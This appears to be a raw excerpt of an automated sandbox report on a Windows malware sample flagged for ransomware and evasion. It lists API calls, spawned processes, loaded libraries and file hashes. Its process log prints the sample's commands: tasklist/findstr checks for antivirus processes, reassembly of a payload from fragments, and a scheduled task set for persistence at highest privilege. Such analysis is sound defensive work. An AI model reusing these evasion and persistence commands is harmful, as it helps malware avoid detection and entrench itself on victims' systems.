Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C040C1: CreateFileW,DeviceIoControl,CloseHandle,10_2_00C040C1
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BF8D11 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00BF8D11
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C055E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00C055E5
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006F55E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_006F55E5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C5B0_2_00406C5B
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BAB02010_2_00BAB020
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BA94E010_2_00BA94E0
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BA9C8010_2_00BA9C80
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C281C810_2_00C281C8
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BC232510_2_00BC2325
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BD643210_2_00BD6432
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BD258E10_2_00BD258E
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BAE6F010_2_00BAE6F0
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BC275A10_2_00BC275A
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BD88EF10_2_00BD88EF
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C2080210_2_00C20802
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BD69A410_2_00BD69A4
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BFEB9510_2_00BFEB95
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BB0BE010_2_00BB0BE0
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BCCC8110_2_00BCCC81
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C08CB110_2_00C08CB1
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C20C7F10_2_00C20C7F
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BD6F1610_2_00BD6F16
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BC32E910_2_00BC32E9
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BCF33910_2_00BCF339
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BBD45710_2_00BBD457
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BC15E410_2_00BC15E4
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BBF57E10_2_00BBF57E
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BAF6A010_2_00BAF6A0
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BA166310_2_00BA1663
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BC77F310_2_00BC77F3
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BC1AD810_2_00BC1AD8
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BCDAD510_2_00BCDAD5
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BD9C1510_2_00BD9C15
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BBDD1410_2_00BBDD14
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BC1EF010_2_00BC1EF0
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BCBF0610_2_00BCBF06
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_0069B02015_2_0069B020
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006994E015_2_006994E0
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_00699C8015_2_00699C80
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_007181C815_2_007181C8
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006B232515_2_006B2325
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006C643215_2_006C6432
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006C258E15_2_006C258E
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_0069E6F015_2_0069E6F0
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006B275A15_2_006B275A
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_0071080215_2_00710802
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006C88EF15_2_006C88EF
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006C69A415_2_006C69A4
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006A0BE015_2_006A0BE0
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006EEB9515_2_006EEB95
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_00710C7F15_2_00710C7F
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006F8CB115_2_006F8CB1
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006BCC8115_2_006BCC81
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006C6F1615_2_006C6F16
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006B32E915_2_006B32E9
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006BF33915_2_006BF339
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006AD45715_2_006AD457
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006AF57E15_2_006AF57E
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006B15E415_2_006B15E4
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_0069166315_2_00691663
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_0069F6A015_2_0069F6A0
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006B77F315_2_006B77F3
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006B1AD815_2_006B1AD8
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006BDAD515_2_006BDAD5
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006C9C1515_2_006C9C15
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006ADD1415_2_006ADD14
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006B1EF015_2_006B1EF0
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006BBF0615_2_006BBF06
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pif 8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif 8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: String function: 00BC0C42 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: String function: 00BB1A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: String function: 00BC8A60 appears 42 times
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: String function: 006B8A60 appears 42 times
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: String function: 006B0C42 appears 70 times
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: String function: 006A1A36 appears 34 times
Source: file.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal84.rans.evad.winEXE@28/49@1/0
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C0A51A GetLastError,FormatMessageW,10_2_00C0A51A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BF8BCC AdjustTokenPrivileges,CloseHandle,10_2_00BF8BCC
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00BF917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00BF917C
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006E8BCC AdjustTokenPrivileges,CloseHandle,15_2_006E8BCC
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifCode function: 15_2_006E917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_006E917C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404983 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404983
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C03FB5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,10_2_00C03FB5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifCode function: 10_2_00C042AA __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,10_2_00C042AA
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifFile created: C:\Users\user\AppData\Local\TechMind360 Innovations CoJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsb6503.tmpJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 812297
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "IndieBeachesHonIo" Janet
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif 812297\Shopzilla.pif 812297\g
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pif "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pif" "C:\Users\user\AppData\Local\TechMind360 Innovations Co\L"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmdJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 812297Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "IndieBeachesHonIo" Janet Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\gJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif 812297\Shopzilla.pif 812297\gJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHESTJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pif "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pif" "C:\Users\user\AppData\Local\TechMind360 Innovations Co\L"Jump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSection loaded: userenv.dllJump to behavior
